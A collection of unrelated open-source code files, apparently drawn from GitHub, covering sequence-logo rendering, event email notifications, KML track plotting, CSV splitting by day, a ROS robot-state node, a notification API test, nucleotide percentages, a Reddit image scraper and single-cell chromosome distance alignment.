imgs = [get_letterimg(lettertable[i], zletterwidth, h) for i,h in zip(idx, zheights)]
if reverse:
imgs = [img for img in reversed(imgs)]
return np.vstack(imgs) if imgs else np.empty((0, zletterwidth, 4))
if style == "seqlogo":
assert positive_only
L = 255*np.ones((zheight,tapelen*zletterwidth,4), np.uint8)
L[:,:,3] = 0 # Transparent
for j in range(tapelen):
bits = 2 + np.sum(tape[:,j] * np.log2(tape[:,j]))
letterimg = make_lettercol( tape[:,j], mid1 * bits/2., reverse=True)
L[mid1-letterimg.shape[0]:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
# Rescale it down to the original requested size
L = np.array(Image.fromarray(L).resize((tapelen*letterwidth, height), Image.ANTIALIAS))
if not transparent:
L[:,:,3] = 255 # full opacity
return L
pos_tape = np.maximum(1e-16, tape)
neg_tape = np.maximum(1e-16,-tape)
pos_colheights = pos_tape.max(axis=0)
neg_colheights = neg_tape.max(axis=0)
#max_colheight = np.maximum(pos_colheights, neg_colheights).max()
#max_colheight = (pos_colheights + neg_colheights).max()
max_colheight = neg_colheights.max()
#neg_colheights = np.minimum(max_colheight,neg_colheights)
pos_colheights /= max_colheight
neg_colheights /= max_colheight
    # If we've been told to scale everything relative to a certain maximum, then adjust our scales accordingly
if vmax:
pos_colheights *= pos_tape.max() / vmax
neg_colheights *= neg_tape.max() / vmax
L = 255*np.ones((zheight,tapelen*zletterwidth,4), np.uint8)
L[:,:,3] = 0 # Start transparent
# For each column of the filter, generate a stack of letters for the logo
for j in range(tapelen):
if style in (None,"stack"):
# Generate the stack of letters that goes above, and below, the dividing ling
aboveimg = make_lettercol( tape[:,j], mid1 * pos_colheights[j], reverse=True)
belowimg = make_lettercol(-tape[:,j], mid1 * neg_colheights[j], reverse=False) if not positive_only else None
# Insert the stacked images into column j of the logo image
L[mid1-aboveimg.shape[0]:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = aboveimg
if not positive_only:
L[mid2:mid2+belowimg.shape[0],j*zletterwidth:(j+1)*zletterwidth,:] = belowimg
if refseq:
letterimg = get_letterimg(refseq[j], zletterwidth, refseq_height, font="ArialBold")
L[mid1+2*bufferzoom:mid2-2*bufferzoom,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
elif style == "growclip":
# Grow the height of each letter based on binding
zletterheight = int(mid1 * neg_colheights[j])
if zletterheight:
letterimg = get_letterimg(refseq[j] if refseq else "N", zletterwidth, zletterheight, font="ArialBold")
L[mid1-letterimg.shape[0]:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
elif style == "refseq":
letterimg = get_letterimg(refseq[j], zletterwidth, refseq_height, font="Arial")
L[mid1-letterimg.shape[0]:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
elif style == "growfade" or style == "grow":
# Grow the height of each letter based on binding
arrowpad_top = 3*bufferzoom
arrowpad_btm = 4*bufferzoom
arrowheight_padded = 0#arrowheight+arrowpad_top+arrowpad_btm
growheight = int((mid1-arrowheight_padded-refseq_height) * neg_colheights[j])
fademin = refseq_height
fademax = refseq_height+0.333*(mid1-arrowheight_padded-refseq_height)
zletterheight = refseq_height + growheight
fade = max(0, min(0.85, (fademax-zletterheight)/(fademax-fademin)))
letterimg = get_letterimg(translate[refseq[j]] if refseq else "N", zletterwidth, zletterheight, font="ArialBold")
if style == "growfade":
letterimg = letterimg*(1-fade) + 255*fade
mid0 = mid1-letterimg.shape[0]
L[mid0:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg[::-1,::] if complement else letterimg
"""
#aboveimg = make_lettercol(tape[:,j], (mid1-bufferzoom*2) * pos_colheights[j], reverse=True)
#intensity = max(0, min(1.0, (pos_colheights[j]-0.4*refseq_height/mid1)/(1.5*refseq_height/mid1)))
#aboveimg = aboveimg*intensity + 255*(1-intensity)
tapej = tape[:,j].copy()
tapej[tapej < 0.10*abs(tape).max()] = 0.0
#if pos_colheights[j] >= 0.15*max(pos_colheights.max(),neg_colheights[j].max()):
if np.any(tapej > 0):
aboveimg = make_lettercol(tapej, (mid1-bufferzoom*3) * pos_colheights[j], reverse=True)
aboveimg = np.minimum(255,aboveimg*0.61 + 255*0.4)
assert mid0-arrowheight-arrowpad_btm >= 0
assert mid0-arrowheight_padded-aboveimg.shape[0] >= 0
L[mid0-arrowheight-arrowpad_btm:mid0-arrowpad_btm,j*zletterwidth:(j+1)*zletterwidth,:] = uparrow_img
L[mid0-arrowheight_padded-aboveimg.shape[0]:mid0-arrowheight_padded,j*zletterwidth:(j+1)*zletterwidth,:] = aboveimg
#grey = aboveimg.mean(axis=2).reshape(aboveimg.shape[:2]+(1,))
#aboveimg[:,:,:] = np.minimum(255,grey.astype(np.float32)*160./grey.min())
#L[mid0-arrowpad_btm-aboveimg.shape[0]:mid0-arrowpad_btm,j*zletterwidth:(j+1)*zletterwidth,:] = aboveimg
"""
elif style == "bar":
assert refseq, "style topbar needs refseq"
# Put the refseq letter, with fixed height
letterimg = get_letterimg(refseq[j], zletterwidth, refseq_height, font="Arial")
L[mid1-letterimg.shape[0]:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
# Draw a bar plot along the top based on neg_colheights
barheight = int((mid1-refseq_height-2*bufferzoom) * neg_colheights[j])
L[mid1-letterimg.shape[0]-barheight-2*bufferzoom:mid1-letterimg.shape[0]-2*bufferzoom,j*zletterwidth:(j+1)*zletterwidth,:] = np.array(barcolors[refseq[j]]).reshape((1,1,4))
elif style == "bars":
assert refseq, "style topbar needs refseq"
# Put the refseq letter, with fixed height
letterimg = get_letterimg(refseq[j], zletterwidth, refseq_height, font="Arial")
L[mid1+2*bufferzoom:mid2-2*bufferzoom,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
# Draw a bar plot along the top based on neg_colheights
aboveheight = int(mid1 * neg_colheights[j])
belowheight = int(mid1 * pos_colheights[j])
L[mid1-aboveheight:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = np.array(barcolors[refseq[j]]).reshape((1,1,4))
L[mid2:mid2+belowheight,j*zletterwidth:(j+1)*zletterwidth,:] = np.array(barcolors[refseq[j]]).reshape((1,1,4))
else:
raise NotImplementedError("Unrecognzied style type")
if style in (None, "stack") and not refseq:
# Put a horizontal line across the middle of this logo
L[mid1:mid1+bufferzoom,:,:] = 100
if not positive_only:
L[mid2-bufferzoom:mid2,:,:] = 100
if not transparent:
L[:,:,3] = 255 # full opacity
# Rescale it down to the original requested size
L = np.array(Image.fromarray(L).resize((tapelen*letterwidth, height), Image.ANTIALIAS))
if complement:
L = L[::-1,:,:] # vertical flip
return L
|
jisraeli/DeepBind
|
code/libs/deepity/deepity/tape2logo.py
|
tape2logo.py
|
py
| 13,154
|
python
|
en
|
code
| 85
|
github-code
|
6
|
14038264100
|
from app.email_body import EmailBody
class User:
def __init__(self, name, nickname, email, locations):
self.name = name
self.nickname = nickname
self.email = email
self.locations = locations
self.artists = []
self.venues = []
self.promoters = []
self.email_body = EmailBody(name)
self.number_of_new_events = 0
def add_artist(self, artist_name, artist_tag):
self.artists.append({"name": artist_name, "tag": artist_tag})
def add_venue(self, venue_name, venue_tag):
self.venues.append({"name": venue_name, "tag": venue_tag})
def add_promoter(self, promoter_name, promoter_tag):
self.promoters.append({"name": promoter_name, "tag": promoter_tag})
def add_to_email(self, event):
if event.event_type == "venue":
if any(venue["name"] == event.venue for venue in self.venues):
self.email_body.add_venue_event(event)
self.email_body.add_tickets(event.tickets)
self.number_of_new_events += 1
elif event.event_type == "artist":
if any(artist["name"] == event.artist for artist in self.artists):
if not self.locations: # notify if no location preference specified
self.email_body.add_artist_event(event)
self.email_body.add_tickets(event.tickets)
self.number_of_new_events += 1
return
for location in self.locations: # notify if location preference matches
if location in event.venue:
self.email_body.add_artist_event(event)
self.email_body.add_tickets(event.tickets)
self.number_of_new_events += 1
elif event.event_type == "promoter":
if any(promoter["name"] == event.promoter for promoter in self.promoters):
self.email_body.add_promoter_event(event)
self.email_body.add_tickets(event.tickets)
self.number_of_new_events += 1
def add_email_ending(self):
venues_list = ", ".join(venue["name"] for venue in self.venues)
artists_list = ", ".join(artist["name"] for artist in self.artists)
promoters_list = ", ".join(promoter["name"] for promoter in self.promoters)
if not self.locations:
locations_list = "Worldwide"
else:
locations_list = ", ".join(self.locations)
self.email_body.add_ending(
venues_list, artists_list, promoters_list, locations_list
)
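

# Usage sketch (illustrative only): how a User might be wired up. The event object
# below is a hypothetical stand-in for the project's real event class -- only the
# attributes read by add_to_email are mimicked.
#
#   from types import SimpleNamespace
#
#   user = User("Ada", "ada", "ada@example.com", locations=["London"])
#   user.add_artist("Four Tet", "four-tet")
#   event = SimpleNamespace(event_type="artist", artist="Four Tet",
#                           venue="Printworks, London", tickets="https://example.com/tickets")
#   user.add_to_email(event)   # matches on artist name and the location preference
#   user.add_email_ending()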
|
polyccon/ra-events-notifier
|
app/user.py
|
user.py
|
py
| 2,621
|
python
|
en
|
code
| 1
|
github-code
|
6
|
43243820127
|
from PyQt5.QtCore import QThread, pyqtSignal
from simplekml import Kml, Snippet, Types
from math import radians, cos, sin, asin, degrees, atan2
import os
class PlotFiles(QThread):
progressSignal = pyqtSignal(int)
threadMessage = pyqtSignal(str)
def __init__(self, results, issilist, google, gps):
QThread.__init__(self)
self.gps = gps
self.results = results
self.issilist = issilist
self.google = google
self.maxRange = len(self.issilist)
self.stopped = 0
def __del__(self):
self.wait()
def plot_the_files(self, results, issi, google, gps, firstplot):
"""
Receives the results and an issi's to plot
:param firstplot:
:param gps:
:param google:
:param results:
:param issi:
:return:
"""
when = []
coord = []
speeds = []
headings = []
times = []
year = results[issi][0][1][6:10]
month = results[issi][0][1][3:5]
day = results[issi][0][1][0:2]
kml = Kml(name="{}_{}-{}-{}".format(issi, year, month, day), open=1)
doc = kml.newdocument(name="{}".format(issi),
snippet=Snippet('Created {}-{}-{}'.format(year, month, day)))
for x in range(0, len(results[issi])):
tup = (results[issi][x][3], results[issi][x][2])
theTime = results[issi][x][1][11:]
when.append("{}-{}-{}T{}Z".format(year, month, day, theTime))
coord.append(tup)
speeds.append(int(results[issi][x][4]))
headings.append(int(results[issi][x][5]))
times.append(results[issi][x][1])
# Create circle track
if gps[0] != 0 and firstplot:
R = 6378.1
d = float(gps[2]) # distance
circle_coords = []
lat1 = radians(float(gps[0]))
lon1 = radians(float(gps[1]))
for b in range(1, 360):
brng = radians(b)
lat2 = asin(sin(lat1) * cos(d / R) + cos(lat1) * sin(d / R) * cos(brng))
lon2 = lon1 + atan2(sin(brng) * sin(d / R) * cos(lat1), cos(d / R) - sin(lat1) * sin(lat2))
lat2 = degrees(lat2)
lon2 = degrees(lon2)
circle_coords.append((lon2, lat2))
doc2 = kml.newdocument(name="Search Area",
snippet=Snippet('{}-{}-{}'.format(gps[0], gps[1], gps[2])))
fol2 = doc2.newfolder(name='Search Area')
trk2 = fol2.newgxtrack(name='search area')
trk2.newgxcoord(circle_coords)
trk2.stylemap.normalstyle.linestyle.color = '641400FF'
trk2.stylemap.normalstyle.linestyle.width = 6
# Folder
fol = doc.newfolder(name='Tracks')
# schema for extra data
schema = kml.newschema()
schema.newgxsimplearrayfield(name='speed', type=Types.int, displayname='Speed')
schema.newgxsimplearrayfield(name='heading', type=Types.int, displayname='Heading')
schema.newgxsimplearrayfield(name='time', type=Types.string, displayname='Time')
# New Track
trk = fol.newgxtrack(name=issi)
# Apply Schema
trk.extendeddata.schemadata.schemaurl = schema.id
# add all info to track
trk.newwhen(when)
trk.newgxcoord(coord)
trk.extendeddata.schemadata.newgxsimplearraydata('time', times)
trk.extendeddata.schemadata.newgxsimplearraydata('speed', speeds)
trk.extendeddata.schemadata.newgxsimplearraydata('heading', headings)
# Styling
trk.stylemap.normalstyle.iconstyle.icon.href = 'http://maps.google.com/mapfiles/kml/shapes/track.png'
trk.stylemap.normalstyle.linestyle.color = '99ffac59'
trk.stylemap.normalstyle.linestyle.width = 6
trk.stylemap.highlightstyle.iconstyle.icon.href = 'http://maps.google.com/mapfiles/kml/shapes/track.png'
trk.stylemap.highlightstyle.iconstyle.scale = 1.2
trk.stylemap.highlightstyle.linestyle.color = '99ffac59'
trk.stylemap.highlightstyle.linestyle.width = 8
kml.save("results/{}_{}-{}-{}.kml".format(issi, year, month, day))
if google:
try:
os.system("start " + "results/{}_{}-{}-{}.kml".format(issi, year, month, day))
            except OSError:
                pass  # opening the KML in Google Earth is best-effort (Windows "start" command)
def run(self):
firstplot = 1
maxPercent = len(self.issilist)
for i in range(len(self.issilist)):
if not self.stopped:
self.plot_the_files(self.results, self.issilist[i], self.google, self.gps, firstplot)
                update = int(((i + 1) / maxPercent) * 100)
                self.progressSignal.emit(update)  # progressSignal is declared as pyqtSignal(int)
if firstplot:
self.sleep(4)
firstplot = 0
else:
break
self.threadMessage.emit('Plotting completed')
def stop(self):
self.stopped = 1
self.threadMessage.emit('Plotting stopped')
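

# Usage sketch (illustrative; the widget names are hypothetical): the thread is created
# by the GUI, its signals are connected, and then it is started in the background:
#
#   plotter = PlotFiles(results, issilist, google=True, gps=(0, 0, 0))
#   plotter.progressSignal.connect(progress_bar.setValue)
#   plotter.threadMessage.connect(status_bar.showMessage)
#   plotter.start()   # QThread schedules PlotFiles.run() on a worker thread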
|
stephenmhall/Coordinator_parser
|
plotfile.py
|
plotfile.py
|
py
| 5,066
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73712875067
|
import pandas as pd
import os
def splitByDay():
for num in range(1,9,1):
print("now is working in---"+"HO_",num,".csv")
print('\n')
#df=pd.read_csv("HO_{}.csv".format(str(num) ) )
data_train=pd.read_csv("I:\Anacoda3\AcondaProject\dataOfOrderAnalysis\HO_{}.csv".format(str(num) ) )
data_train['dates'] = pd.to_datetime(data_train['dates'])
df = data_train.set_index('dates')
year='2017'
Month=df['month']
Day=df['day']
monthMin=Month.min()
monthMax=Month.max()
dayMin=Day.min()
dayMax=Day.max()
spl(df,year,monthMin,monthMax,dayMin,dayMax)
def spl(df,year,monthMin,monthMax,dayMin,dayMax):
df=df
year=year
monthMin=monthMin
monthMax=monthMax
dayMin=dayMin
dayMax=dayMax
for month in range(monthMin,monthMax+1,1):
if month==6 or month==9:
dayMax=30
for day in range(dayMin,dayMax+1,1):
date=year+'-'+ str(month)+'-'+ str(day)
#date='2017-8-{}'.format( str( day))
print(date)
a=df[date]
print('\n')
for column in list(a.columns[a.isnull().sum() > 0]):
mean_val = a[column].mean()
a[column].fillna(mean_val, inplace=True)
#I:\Anacoda3\AcondaProject\dataOfOrderAnalysis\subList\
a=a.reset_index(drop = True)
columns=['type','start_dest_distance', 'arrive_time', 'departure_time', 'pre_total_fee', 'normal_time']
a=a[columns]
filename = '{}.csv'.format( str(date) )
            print('now splitting --- ' + filename)
mergeOrJustWrite(a,filename)
#a.to_csv(filename)
print('save '+filename+' over!' )
print('\n')
def mergeOrJustWrite(a,filenameBeChecked):
a=a
samefilename=filenameBeChecked
#path='I:/Anacoda3/AcondaProject/dataOfOrderAnalysis/subList'
path='I:/Anacoda3/AcondaProject/dataOfOrderAnalysis/subList/tomysqlFinished'
#os.getcwd()
#os.chdir(path)
files = file_name(path)
# for fname in files:
# print(fname)
if str(samefilename) in files:
print(samefilename+' already exist!')
a.to_csv('{}/re/{}'.format( path,str( samefilename)))
#os.chdir(path)
else:
print('a new file!')
a.to_csv('{}/{}'.format( path,str ( samefilename)))
def file_name(file_dir):
for root, dirs, files in os.walk(file_dir):
return files
        #print(root)   # current directory path
        #print(dirs)   # all subdirectories under the current path
        #print(files)  # all non-directory files under the current path
if __name__ == "__main__":
splitByDay()
|
jasscical/pythonLearning
|
06_ๆๆฏๅคฉๅๆ184ๅผ ่กจ.py
|
06_ๆๆฏๅคฉๅๆ184ๅผ ่กจ.py
|
py
| 3,149
|
python
|
en
|
code
| 0
|
github-code
|
6
|
7847083907
|
#!/usr/bin/env python
"""
.. module::robot_state
:platform: Unix
:synopsis: Python module for the state machine
ROS node which keeps track of the robot pose and battery status.
This is a simplified version; for the full documentation please refer to `the original code <https://github.com/buoncubi/arch_skeleton>`_
"""
import rospy
import random
import threading
import time
from std_msgs.msg import String, Bool
from assignment_1.msg import Point
from assignment_1.srv import GetPose, GetPoseResponse, SetPose, SetPoseResponse
class RobotState:
def __init__(self):
# Initialise this node
rospy.init_node('robot_state')
# Initialise robot position.
self._pose = Point(x=0.0, y=0.0)
# Initialise battery level
self._battery_low = False
print('robot_state')
# Initialise randomness
self._random_battery_time = rospy.get_param("/battery_time", [15.0, 40.0])
# Define services
rospy.Service("/get_pose", GetPose, self.get_pose)
rospy.Service("/set_pose", SetPose, self.set_pose)
# Start publisher on a separate thread
th = threading.Thread(target=self._battery_status)
th.start()
def set_pose(self, request):
if request.pose is not None:
self._pose = request.pose
else:
rospy.logerr('Cannot set an unspecified robot position')
return SetPoseResponse()
def get_pose(self, request):
response = GetPoseResponse()
response.pose = self._pose
return response
def _battery_status(self):
# Define a publisher
pub = rospy.Publisher('battery_status', Bool, queue_size=1)
while not rospy.is_shutdown():
# Publish battery level
pub.publish(Bool(self._battery_low))
            # Wait to simulate battery usage.
delay = random.uniform(self._random_battery_time[0], self._random_battery_time[1])
rospy.sleep(delay)
# Change battery state.
self._battery_low = not self._battery_low
if __name__ == "__main__":
# Instantiate the node manager class and wait
RobotState()
rospy.spin()
|
SamueleD98/assignment_1
|
scripts/robot_state.py
|
robot_state.py
|
py
| 2,198
|
python
|
en
|
code
| 0
|
github-code
|
6
|
32381382238
|
import string
import os
import random
import bs4
from urllib import request
url = "http://reddit.com"
urlPage = request.urlopen(url).read()
soup = bs4.BeautifulSoup(urlPage, "html.parser")
img_list = []
for img in soup.find_all('img'):
img_item = str(img.get('src')).split('//')
img_list.append(img_item[1])
#print(img_list)
r = 8
all_chars = string.ascii_letters
# replace this folder_address variable to the directory which you wish to save
# the image files on your computer
folder_address = "C:\\Users\\User\\Documents\\Codes\\Python Scripts\\Reddit\\Pics\\"
for item in img_list:
request.urlretrieve("http://" + item,
+ ''.join(random.choice(all_chars) for x in range(0, r)) + ".jpg")
print("finished downloading images")
|
techreign/Webscraping
|
ImageScraper.py
|
ImageScraper.py
|
py
| 739
|
python
|
en
|
code
| 0
|
github-code
|
6
|
27520740533
|
import os
import datetime
import netCDF4
def handle_netcdf_scheme_wrf(var_names, file_name, run, model, st):
# try:
if os.path.exists(file_name):
data_list = []
file = netCDF4.Dataset(file_name)
var1 = file.variables[var_names[0]][:]
var2 = file.variables[var_names[1]][:]
times = file.variables["Times"][:].astype("str")
var_latlon = (file.variables["XLAT"][0, :, :],
file.variables["XLONG"][0, :, :])
file.close()
        # log file
log = open(st["ensemble_log_directory"][0] +
"Loaded_%s_%s.log" %
(model, run.strftime("%Y%m%d%H")), 'w')
for t in range(times.shape[0]):
var_date = datetime.datetime.strptime(
"".join(list(times[t])), "%Y-%m-%d_%H:00:00")
if var_date <= (st['run'][0] +
datetime.
timedelta(hours=int(st['hours_ensemble'][0]))):
var_value = var1[t, :, :] + var2[t, :, :]
accumulation = t
if t == 0:
data_list.append((model,
run,
var_date,
(var_value, accumulation),
"latlon", var_latlon))
else:
data_list.append((model,
run,
var_date,
(var_value, accumulation)))
log.write("run: %s --- Data: %s --- file: %s \n" %
(run.strftime("%Y%m%d%H"),
var_date.strftime("%Y%m%d%H"), file_name))
log.close()
return data_list
# except:
# return None
|
RevertonLuis/Ensemble
|
lib/handle_netcdfs.py
|
handle_netcdfs.py
|
py
| 2,022
|
python
|
en
|
code
| 1
|
github-code
|
6
|
10502966682
|
from rest_framework.test import APITestCase
from ...services.notification_service import NotificationService
from django.urls import reverse
class TestNotificationAPI(APITestCase):
def setUp(self):
self.payload = {
"title": "Winter discount sale started",
"description": "Enter coupon-code to get flat 10% discount"
}
self.notification_id = NotificationService().create(self.payload).id
self.url = reverse("notification")
def test_create_notification(self):
data = {
"title": "Summer discount sale started",
"description": "Enter coupon-code to get flat 10% discount"
}
notification = self.client.post(self.url, data=data, format='json')
self.assertEqual(notification.data.get('title'), data.get('title'))
def test_get_all_notification(self):
notification = self.client.get(self.url)
self.assertNotEqual(len(notification.data), 0)
def test_get_notification_by_id(self):
notification = NotificationService().get_by_id(self.notification_id)
self.assertEqual(notification.id, self.notification_id)
def test_delete_notification_by_id(self):
response = self.client.delete(self.url+"?id={}".format(self.notification_id), data={}, format='json')
self.assertEqual(response.data.get('success'), True)
|
anojkr/onboarding-project
|
push_notification/apps/notification/tests/unit/test_notification.py
|
test_notification.py
|
py
| 1,381
|
python
|
en
|
code
| 0
|
github-code
|
6
|
43447073770
|
import sys, re
from argparse import ArgumentParser
parser = ArgumentParser(description = 'Calculate the percentage of each nucleotide in the sequence')
parser.add_argument("-s", "--seq", type = str, required = True, help = "Input sequence")
args = parser.parse_args()
seq = args.seq.upper()
if re.search('^[ACGTU]+$', seq):
u= seq.count("U") #this counts the U Percentage
a= seq.count("A") #this counts the A Percentage
c= seq.count("C") #this counts the C Percentage
t= seq.count("T") #this counts the T Percentage
g= seq.count("G") #this counts the G Percentage
u_content= (u/len(seq)) * 100 #Calculate the U percentage
a_content= (a/len(seq)) * 100 #Calculate the A percentage
c_content= (c/len(seq)) * 100 #Calculate the C percentage
t_content= (t/len(seq)) * 100 #Calculate the T percentage
g_content= (g/len(seq)) * 100 #Calculate the G percentage
print (f"The % of U in sequence is: {u_content}") #Print the U Percentage
print (f"The % of A in sequence is: {a_content}") #Print the A Percentage
print (f"The % of C in sequence is: {c_content}") #Print the C Percentage
print (f"The % of T in sequence is: {t_content}") #Print the T Percentage
print (f"The % of G in sequence is: {g_content}") #Print the G Percentage
else:
print ('The sequence is not DNA or RNA')
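
# Example invocation (illustrative):
#   python Percentage.py --seq ACGTACGT
# reports 25.0% for each of A, C, G and T, and 0.0% for U.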
|
stepsnap/git_HandsOn
|
Percentage.py
|
Percentage.py
|
py
| 1,350
|
python
|
en
|
code
| 0
|
github-code
|
6
|
44855918296
|
class Solution:
def countBits(self, num):
"""
:type num: int
:rtype: List[int]
"""
if num < 0:
return [0]
ans = []
for i in range(0,num+1):
ans.append(len(bin(i)[2:].replace('0','')))
return ans
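
# Quick check (sketch): each entry is the number of set bits in the binary form of i.
if __name__ == "__main__":
    print(Solution().countBits(5))  # expected output: [0, 1, 1, 2, 1, 2]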
|
sandeepjoshi1910/Algorithms-and-Data-Structures
|
countbits.py
|
countbits.py
|
py
| 308
|
python
|
en
|
code
| 0
|
github-code
|
6
|
4582056106
|
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from scipy import stats
import collections
import time
from sklearn import cluster
from sklearn.metrics import adjusted_rand_score
import scipy as sp
from tqdm import tqdm
from sklearn.manifold import MDS
from run_dist_mat import *
from scipy.cluster.hierarchy import dendrogram, linkage
import itertools
from mpl_toolkits.mplot3d import Axes3D
from multiprocessing import Pool
from itertools import repeat
def get_sex_of_cell(cell_data):
    assert cell_data.loc[cell_data.chr == 20].shape[0] > 1, "data matrix must have sex chromosomes"
if cell_data.loc[cell_data.chr == 21].shape[0] > 1: return 'm' ##check this
else: return 'f'
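
# (In this data chromosome 20 encodes X and 21 encodes Y, so the presence of chr-21 reads marks a male cell.)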
def make_groups_by_bins(cell_data, bin_size, cum_lens, include_sex_chromosomes = False):
if include_sex_chromosomes == False:
bins, num_bins_per_chr = get_bins(bin_size, cum_lens, num_chrs = 19)
num_bins = np.sum(list(num_bins_per_chr.values()))
cell_data = cell_data.loc[cell_data.chr < 20].copy()
cell_data['abs_pos'] = -1
cell_data['abs_pos'] = cell_data.pos.copy() + [cum_lens[ch-1] for ch in cell_data.chr] #encodes the absolute position of the reads along the linear genome
groups = cell_data.groupby([pd.cut(cell_data.abs_pos, bins),pd.cut(cell_data.pckmeans_cluster, [-0.1,0.9,2])]).mean().reindex(pd.MultiIndex.from_product([bins[1:], [0,1]]), fill_value = np.nan)
assert groups.shape[0] == 2 * num_bins
return groups
elif include_sex_chromosomes == True:
cell_data = cell_data.loc[cell_data.chr < 22].copy()
if get_sex_of_cell(cell_data) == 'f':
print("female cell")
bins, num_bins_per_chr = get_bins(bin_size, cum_lens, num_chrs = 20)
autosome_num_bins = np.sum(list(num_bins_per_chr.values())[0:20]) #sum of all autosome chromosomes
x_num_bins = num_bins_per_chr[20]
cell_data = cell_data.loc[cell_data.chr != 21] #getting rid of the noisy y chromosome reads
assert cell_data.loc[cell_data.chr == 20, 'pckmeans_cluster'].unique().shape[0] == 2, "x chromosome must have 2 clusters"
assert cell_data.loc[cell_data.chr == 21, 'pckmeans_cluster'].unique().shape[0] == 0, "y chromosome must have no clusters"
cell_data['abs_pos'] = -1
cell_data['abs_pos'] = cell_data.pos.copy() + [cum_lens[ch-1] for ch in cell_data.chr] #encodes the absolute position of the reads along the linear genome
groups = cell_data.groupby([pd.cut(cell_data.abs_pos, bins),pd.cut(cell_data.pckmeans_cluster, [-0.1,0.9,2])]).mean().reindex(pd.MultiIndex.from_product([bins[1:], [0,1]]), fill_value = np.nan)
assert groups.shape[0] == 2 * autosome_num_bins + x_num_bins
return groups
else: #male cells
            assert cell_data.loc[cell_data.chr == 20, 'pckmeans_cluster'].unique().shape[0] == 1, "x chromosome must have 1 cluster in male embryo"
            assert cell_data.loc[cell_data.chr == 21, 'pckmeans_cluster'].unique().shape[0] == 1, "y chromosome must have 1 cluster in male embryo"
cell_data['abs_pos'] = -1
cell_data['abs_pos'] = cell_data.pos.copy() + [cum_lens[ch-1] for ch in cell_data.chr] #encodes the absolute position of the reads along the linear genome
bins, num_bins_per_chr = get_bins(bin_size, cum_lens, num_chrs = 21)
autosome_num_bins = np.sum(list(num_bins_per_chr.values())[0:20]) #sum of all autosome chromosomes
x_num_bins = num_bins_per_chr[20]
y_num_bins = num_bins_per_chr[21]
autosome_bins = bins[0:autosome_num_bins+1]
x_bins = bins[autosome_num_bins: autosome_num_bins+x_num_bins+1]
y_bins = bins[autosome_num_bins+x_num_bins:]
autosome_chrs = cell_data.loc[cell_data.chr <= 19]
x_chr = cell_data.loc[cell_data.chr == 20]
y_chr = cell_data.loc[cell_data.chr == 21]
autosome_chr_groups = autosome_chrs.groupby([pd.cut(autosome_chrs.abs_pos, autosome_bins),pd.cut(autosome_chrs.pckmeans_cluster, [-0.1,0.9,2])]).mean().reindex(pd.MultiIndex.from_product([autosome_bins[1:], [0,1]]), fill_value = np.nan)
x_chr_groups = x_chr.groupby([pd.cut(x_chr.abs_pos, x_bins),pd.cut(x_chr.pckmeans_cluster, [-0.5,0.5])]).mean().reindex( pd.MultiIndex.from_product([x_bins[1:], [0]]), fill_value = np.nan)
y_chr_groups = y_chr.groupby([pd.cut(y_chr.abs_pos, y_bins),pd.cut(y_chr.pckmeans_cluster, [-0.5,0.5])]).mean().reindex(pd.MultiIndex.from_product([y_bins[1:], [0]]), fill_value = np.nan)
groups = pd.concat([autosome_chr_groups,x_chr_groups, y_chr_groups], axis = 0)
assert groups.shape[0] == 2 * autosome_num_bins + x_num_bins + y_num_bins
return groups
else:
        raise ValueError("please indicate whether sex chromosomes should be included or not")
def get_inter_cell_dist(m0,m1):
n = m0.shape[0]
    k = 1  # exclude the diagonal for the 38x38 representations, because the 0s on the diagonal artificially raise the correlation value
ut_ind = np.triu_indices(n, k)
assert ut_ind[0].shape[0] == n*(n-1)/2
m0_unrav = m0[ut_ind] #len is n*(n+1)/2
m1_unrav = m1[ut_ind]
#find indices where both unraveled matrices are not nan
filt = (np.isnan(m0_unrav)+np.isnan(m1_unrav))==0
#reduce the matrices to only indices that are not nan for both
m0_filt = m0_unrav[filt]
m1_filt = m1_unrav[filt]
    #if the two matrices share one or no indices that are not nan, return nan. Otherwise, find the Pearson correlation.
if sum(~np.isnan(m0_filt))<=1:
r=np.nan
else:
#get pearson's r
r = sp.stats.pearsonr(m0_filt,m1_filt)[0]
return 1 - r, np.sum(filt) #r is the correlation, len(filt) is the size of the intersection
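
# Worked example (sketch): for two identical n x n distance matrices with no NaNs and a
# non-constant upper triangle, the upper-triangle entries correlate perfectly with
# themselves (r = 1), so get_inter_cell_dist(m, m) returns (0.0, n*(n-1)//2).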
"""wrapper (utility) function. using this to do data parallelism"""
def align_cell_i(cell_id_i, bin_size, sample_from_bin):
# random_state = 500
num_samples = 50
print("aligning cell {}".format(cell_id_i))
bins, num_bins_per_chr = get_bins(bin_size, cum_lens, num_chrs)
cell_i = data.loc[(data.cell_index==cell_id_i) & (data.chr <= num_chrs)].copy()
#encodes the absolute position of the reads along the linear genome--> used for binning
cell_i['abs_pos'] = -1
cell_i['abs_pos'] = cell_i.pos.copy() + [cum_lens[ch-1] for ch in cell_i.chr]
cell_i_dist_mat, _ = pckmeans_get_dist_mat_binned(cell_i, bins, num_bins_per_chr, sample_from_bin)
cell_i_dists = []
cell_i_intersection_sizes = []
cids_after_i = data.loc[data.cell_index >= cell_id_i, 'cell_index'].unique()
for cell_id_j in cids_after_i:
cell_j = data.loc[(data.cell_index==cell_id_j) & (data.chr <= num_chrs)].copy()
cell_j['abs_pos'] = -1
cell_j['abs_pos'] = cell_j.pos.copy() + [cum_lens[ch-1] for ch in cell_j.chr]
cell_j_dist_mat, _ = pckmeans_get_dist_mat_binned(cell_j, bins, num_bins_per_chr, sample_from_bin)
cell_j_dists = []
cell_j_intersection_sizes = []
for sample in range(num_samples): #in order to align cell j with cell i, we run the sequential algorithm on 50 random sequences
order = np.arange(1,20)
np.random.shuffle(order)
#bit_seq is something like x = [0,1,1,1,0,...] of length 19 where x[i]=0 means that in cell j we don't swap the copies of chromosome i. #bin_seq is something like [23,24,12,11,...] which has the actual sequnce of the aligned bins
(dist, intersection_size), bit_seq, bin_seq, _ = get_aligned_inter_cell_dist(cell_i_dist_mat, cell_j_dist_mat, num_bins_per_chr, chr_seq = order) #np.arange(19,0,-1)
